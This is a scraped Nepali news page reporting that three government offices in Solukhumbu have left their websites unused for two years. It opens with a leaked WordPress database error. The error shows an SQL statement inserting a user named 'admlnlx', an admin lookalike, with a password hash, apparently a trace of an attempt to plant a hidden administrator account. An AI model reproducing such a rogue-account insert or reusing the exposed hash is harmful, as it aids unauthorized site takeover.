WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BuroVKKAqL7T/yQpVEj4.2a2TjVT9S.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-07 11:31:30', '', 'admlnlx', 'admlnlx')

सोलुखुम्बुमा तीन सरकारी कार्यलय वेभ साईट प्रयोग बिहीन – Gaule Khabar

सोलुखुम्बुमा तीन सरकारी कार्यलय वेभ साईट प्रयोग बिहीन

सोलुखुम्बुमा तीन सरकारी कार्यलय वेभ साईट प्रयोग बिहीन

गाउँले न्युज, २७ साउन, सोलुखुम्बु । सोलुखुम्बु जिल्लामा तीन सरकारी कार्यलय आफ्नो बेभ साईट प्रयोग विहीन रहेको पाईएको छ ।
जिल्लामा रहेक सरकारी कार्यालयहरु मध्ये नापि, मालपोत र शिक्षा विकास तथा समन्वय ईकाईको वेभ साईट दुई वर्ष देखी निरन्तर सन्चालन नरहेको पाईएको हो ।

शिक्षा विकास तथा समन्वय ईकाई शिक्षाको दुई वर्ष देखि सबै कोलमहरु पुरानै रहेका छन् भने कार्यालयका नाम पुरानै जिल्ला शिक्षा कार्यलय रहको छ ।

त्यस्तै नापि कार्यलयको पनि बेभसाईट प्रयोग विहीन रहेको छ । नापि विभागले बेभ साईट अपग्रेड गरिरहेकाले सुचना तथा जनाकारी अपडेट नगरेको कार्यलयले जनाएको छ ।
त्यस्तै मालपोत कार्यलयको वेभ साईटका सबै कोलमहरु खाली नै रहेको छ ।

साभार: हिमाल एफ एम

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका